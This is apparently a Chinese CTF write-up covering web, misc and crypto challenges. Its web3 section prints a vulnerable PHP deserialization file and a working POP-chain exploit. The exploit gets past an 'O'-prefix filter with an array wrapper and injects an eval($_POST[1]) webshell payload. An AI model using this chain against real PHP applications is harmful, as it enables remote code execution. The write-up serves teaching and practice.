web

web1

CVE直接打

web2

远程文件包含

web3

www.zip源码泄露

得到demo.php

<?php

class Water{
    public $waterfall;
    public function __construct(){
        $this->waterfall = array();
    }
    public function __get($value){
        $function = $this->waterfall;
        return $function();
    }
}


class Circle{
    public $daemon;
    protected $dash;
    public function __toString(){
        return $this->daemon;
    }
    public function runc($value){
        echo $value;
        @eval($value);
    }
    public function __invoke(){
        $this->runc($this->dash);
    }
}

class Range{
    public $horis;
    public $link;
    public function __construct($link="link"){
        $this->link = $link;
        echo $link;
    }
    public function __toString(){
        return $this->link->horis;
    }
}

class Sliver{
    public $secret;
    public $resty;
    public function __construct($nice="wow"){
        $this->secret = $nice;
        echo "My secert --- ".$this->secret."<br>";
    }
    public function __destruct(){
        if(preg_match("/circle|gopher|http|file|ftp|https|dict|\.\./i", $this->secret)) {
            echo "no~no~no~";
        }
    }
    function __wakeup(){
        if ($this->secret != 'circle') {
            $this->secret = 'circle';
        }
    }
}
highlight_file(__FILE__);

$data = $_GET['data'];
if(isset($data)){
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$q);
    foreach($q as $v)
    {
        if(preg_match("/^O/i",$v))
        {
            die('YOU ARE hacker!!!');
            exit();
        }
    }
    unserialize($data);
}

?>

简单的反序列化POP链构造

需要绕过的点

• 传入的参数不能以O开头=>使用数组作为反序列化对象进行绕过
• wakeup这里存在字符串比较（$this->secret != 'circle'），可以直接跳转到__toString

接着就是构造pop链，链子很简单，也是线性的

<?php

class Water{
    public $waterfall;
}


class Circle{
    public $daemon;
    protected $dash;
    public function __construct(){
        $this->dash="eval(\$_POST[1]);";
    }
}

class Range{
    public $horis;
    public $link;
}

class Sliver{
    public $secret;
    public $resty;
}

$w = new Water();
$c = new Circle();
$r = new Range();
$s = new Sliver();


$w->waterfall=$c;
$r->link=$w;
$s->secret=$r;
$a = array("1",$s);
$final = serialize($a);
echo urlencode($final);

Sliver::_wakeup => Range::toString => Water::get => Circle::__invoke => Circle::runc

misc

misc1

第一步base64解密

第二步写脚本两个字节一组，相互替换

# -*- coding: utf-8 -*-
# @Time : 2022/9/10 9:11
# @Author : pysnow
old = open('base64.png', 'rb')
new = open('new.png', 'ab')

while True:
    buttle = old.read(2)[::-1]
    if buttle == b'':
        break
    new.write(buttle)

old.close()
new.close()

第三步：

LSB脚本一把梭，密码就是万能和弦 4536251

crypto

crypto1

A换成-，B换成.，摩斯密码解密后甩到quip一键解密

crypto2

密文 FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv

通过栅栏2加密得到FLAG关键词，根据提示flag{uuid}，uid的格式为8-4-4-4-12

其中只包含a-f 0-9，密文没有数字，猜测是在字母表上进行替换

opqrstuvwx
0123456789
upper => lower
l => -
8-4-4-4-12
大写字母直接替换对应的小写字母
# -*- coding: utf-8 -*-
# @Time : 2022/9/10 15:22
# @Author : pysnow
enc = 'FvLFArGp[ovpxBpsssD]qCElwwoClsoColwpuvlqFv'.replace('l', '-').replace('[', '{').replace(']', '}')
a = 'opqrstuvwx'
res = ''
for i in enc:
    if i in a:
        res += str(a.index(i))
    else:
        res += i
print(res.lower())

f7lfa3g1{0719b1444d}2ce-880c-40c0-8167-2f7

观察可以发现右花括号后面就是-4-4-4-的形式，前面栅栏2加密

因为要构造uuid结构，直接在第第五位开始截取

flag{7914d 7f3101b44} <= 2ce-880c-40c0-8167-2f7

flag{7914d2ce-880c-40c0-8167-2f77f3101b44}